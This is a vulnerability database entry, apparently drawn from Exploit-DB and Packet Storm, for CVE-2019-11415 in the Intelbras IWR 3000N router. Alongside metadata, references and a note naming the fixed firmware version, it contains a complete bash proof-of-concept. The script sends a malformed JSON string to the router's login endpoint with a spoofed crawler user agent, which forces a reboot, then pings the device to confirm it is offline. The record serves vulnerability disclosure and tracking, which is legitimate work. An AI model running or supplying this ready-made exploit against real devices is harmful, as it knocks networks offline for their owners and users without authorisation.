ID

VAR-E-201904-0103


CVE

cve_id:CVE-2019-11415

Trust: 1.5

sources: PACKETSTORM: 152680 // EXPLOIT-DB: 46768

EDB ID

46768


TITLE

Intelbras IWR 3000N - Denial of Service (Remote Reboot) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 46768

DESCRIPTION

Intelbras IWR 3000N - Denial of Service (Remote Reboot). CVE-2019-11415 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 46768

AFFECTED PRODUCTS

vendor:intelbrasmodel:iwr 3000nscope: - version: -

Trust: 2.1

sources: PACKETSTORM: 152680 // EXPLOIT-DB: 46768 // EDBNET: 101389

EXPLOIT

#/bin/bash

# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.

clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080

alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi

if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi

clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi

Trust: 1.0

sources: EXPLOIT-DB: 46768

EXPLOIT LANGUAGE

sh

Trust: 0.6

sources: EXPLOIT-DB: 46768

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 46768

TYPE

Denial of Service (Remote Reboot)

Trust: 1.6

sources: EXPLOIT-DB: 46768 // EDBNET: 101389

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 152680

CREDITS

Social Engineering Neo

Trust: 0.6

sources: EXPLOIT-DB: 46768

EXTERNAL IDS

db:EXPLOIT-DBid:46768

Trust: 1.6

db:NVDid:CVE-2019-11415

Trust: 1.5

db:EDBNETid:101389

Trust: 0.6

db:PACKETSTORMid:152680

Trust: 0.5

sources: PACKETSTORM: 152680 // EXPLOIT-DB: 46768 // EDBNET: 101389

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2019-11415

Trust: 1.5

url:https://www.exploit-db.com/exploits/46768/

Trust: 0.6

sources: PACKETSTORM: 152680 // EXPLOIT-DB: 46768 // EDBNET: 101389

SOURCES

db:PACKETSTORMid:152680
db:EXPLOIT-DBid:46768
db:EDBNETid:101389

LAST UPDATE DATE

2022-07-27T09:18:12.470000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:152680date:2019-04-30T16:04:20
db:EXPLOIT-DBid:46768date:2019-04-30T00:00:00
db:EDBNETid:101389date:2019-04-30T00:00:00